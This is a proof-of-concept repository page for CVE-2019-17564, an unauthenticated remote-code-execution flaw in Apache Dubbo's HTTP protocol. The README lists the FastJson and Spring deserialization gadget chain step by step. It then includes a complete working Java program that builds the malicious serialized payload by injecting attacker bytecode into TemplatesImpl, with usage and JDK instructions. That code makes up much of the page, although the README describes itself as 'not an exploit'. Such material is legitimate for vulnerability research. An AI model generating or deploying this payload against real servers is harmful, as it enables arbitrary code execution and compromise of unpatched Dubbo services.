
CVE-2019-17564 PoC — Apache Dubbo Security Vulnerability

Associated Vulnerability
Title: Apache Dubbo Security Vulnerability (CVE-2019-17564)
Description: A security vulnerability exists in Apache Dubbo versions 2.7.0 through 2.7.4, 2.6.0 through 2.6.7, and 2.5.x. It stems from Apache Dubbo handling the message body improperly once the HTTP protocol is enabled. An attacker can exploit this vulnerability to execute arbitrary code.
Description
Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564 - more information available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability
Readme
# CVE-2019-17564 FastJson + SpringFramework Gadget for Dubbo 2.7.3
Our full write-up is available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability

Note that *this is not an exploit*; it is a POC gadget chain, used inside an exploit, that demonstrates what deserialization can reach in scopes containing certain dependencies.

# Overview
Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564. This code will print, and locally deserialize, a gadget based on dependencies available in the scope of Dubbo 2.7.3, Dubbo Common 2.7.3, and Spring Framework 

# Gadget Chain Structure
1. HashMap.putVal(h,k,v), reached from HashMap.readObject() while the map is being deserialized
    a. The result of hashCode(), h, is identical for all HotSwappableTargetSource objects, so inserting a second HotSwappableTargetSource key collides with the first and triggers the deeper equals() call between the two keys
2. HotSwappableTargetSource.equals()
3. XString.equals()
4. com.alibaba.fastjson.JSON.toString()
5. com.alibaba.fastjson.JSON.toJSONString()
6. com.alibaba.fastjson.serializer.MapSerializer.write()
7. TemplatesImpl.getOutputProperties()
8. TemplatesImpl.newTransformer()
9. TemplatesImpl.getTransletInstance()
10. TemplatesImpl.defineTransletClasses()
11. ClassLoader.defineClass()
12. Class.newInstance()
13. MaliciousClass.<clinit>()
14. Runtime.exec()
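
The chain above in working form, as an added example that is not the repository's own `DubboGadget.java`: it builds the colliding `HashMap`, wraps the `XString` and the fastjson `JSONObject` in `HotSwappableTargetSource` keys, and stuffs a `TemplatesImpl` into the `JSONObject` so that fastjson's bean serializer reaches `getOutputProperties()`. The class name `GadgetChainExample`, the key names and the command-line arguments are assumptions; the translet class file is assumed to be one you compiled yourself that extends `com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet`, since its static initializer is step 13 of the chain. Unlike marshalsec's reflective `HashMap$Node` construction, the map is filled with two harmless, unequal targets first and the real targets are swapped in afterwards with the public `swap()` method, so building the map never fires the chain.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;

import com.alibaba.fastjson.JSONObject;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import org.springframework.aop.target.HotSwappableTargetSource;

// Hypothetical class name; this is an added example, not the repository's DubboGadget.java.
public class GadgetChainExample {

    // TemplatesImpl has no setters for the fields we need, so set them reflectively.
    private static void setField(Object target, String name, Object value) throws Exception {
        Field f = target.getClass().getDeclaredField(name);
        f.setAccessible(true);
        f.set(target, value);
    }

    // Steps 7-14: a TemplatesImpl whose _bytecodes hold the attacker-supplied translet class.
    // Assumption: transletBytes is a compiled class extending AbstractTranslet; its <clinit>
    // is what runs once defineTransletClasses()/newInstance() are reached.
    static TemplatesImpl makeTemplates(byte[] transletBytes) throws Exception {
        TemplatesImpl t = new TemplatesImpl();
        setField(t, "_bytecodes", new byte[][] { transletBytes });
        setField(t, "_name", "Pwnr");                              // any non-null name
        setField(t, "_tfactory", new TransformerFactoryImpl());    // needed when triggered without deserialization
        return t;
    }

    // Steps 1-6: two keys whose hashCode() collide so that, when the map is deserialized,
    // HashMap.putVal() calls HotSwappableTargetSource.equals() -> XString.equals()
    // -> JSONObject.toString() -> JSON.toJSONString() -> MapSerializer.write() -> TemplatesImpl getters.
    static HashMap<Object, Object> makeTrigger(TemplatesImpl templates) {
        JSONObject holder = new JSONObject();
        holder.put("t", templates);   // key name is arbitrary; the value's getters are what matter

        // Insert with harmless, unequal String targets so building the map does not fire the chain.
        HotSwappableTargetSource first  = new HotSwappableTargetSource("a");
        HotSwappableTargetSource second = new HotSwappableTargetSource("b");
        HashMap<Object, Object> map = new HashMap<>();
        map.put(first, "x");    // written first, so readObject() re-inserts it first
        map.put(second, "y");   // written second; putVal() evaluates second.equals(first)

        // Swap in the real targets. On deserialization: second.equals(first)
        // -> xstring.equals(holder) -> holder.toString() -> fastjson serializes the TemplatesImpl.
        first.swap(holder);
        second.swap(new XString("irrelevant"));
        return map;
    }

    static byte[] serialize(Object o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        if (args.length < 2) {
            System.err.println("usage: GadgetChainExample <Translet.class> <payload.ser> [--run-locally]");
            System.exit(2);
        }
        byte[] translet = Files.readAllBytes(Paths.get(args[0]));
        byte[] payload = serialize(makeTrigger(makeTemplates(translet)));
        Files.write(Paths.get(args[1]), payload);
        System.out.println("wrote " + payload.length + " bytes to " + args[1]);

        // Optional local round trip, which is what the README says the original code does:
        // this deserializes the payload in the current JVM and therefore runs the translet's <clinit>.
        if (args.length > 2 && "--run-locally".equals(args[2])) {
            try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload))) {
                ois.readObject();
            }
        }
    }
}
```

The example targets JDK 8, which is what the Dubbo 2.7.3 era assumed; on JDK 9 and later the `com.sun.org.apache.xalan.internal` and `com.sun.org.apache.xpath.internal` packages are not exported and the reflective writes to `TemplatesImpl` need `--add-exports`/`--add-opens` for `java.xml`. Only `fastjson` and `spring-aop` need to be on the classpath beyond the JDK, which is exactly why the chain is interesting in Dubbo's dependency scope.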

# Credits
Credits are in order to Chris Frohoff and Moritz Bechler for their research and tools (ysoserial and marshalsec), as some of their code was used in the gadget chain, and their research laid the foundation for this exploit.

Credits are also in order to Checkmarx, who enable this type of research, and our fantastic research group for pitching ideas, reviewing, and bearing the fact that I won't shut up about this type of stuff.
File Snapshot

[4.0K] /data/pocs/32357a24f11da4ce5289d20fa993144d9fa6f57b
├── [1.6K] pom.xml
├── [1.7K] README.md
└── [4.0K] src
    └── [4.0K] main
        └── [4.0K] java
            └── [4.0K] DubboGadget
                ├── [2.0K] DubboGadget.java
                └── [8.0K] Utils.java

4 directories, 4 files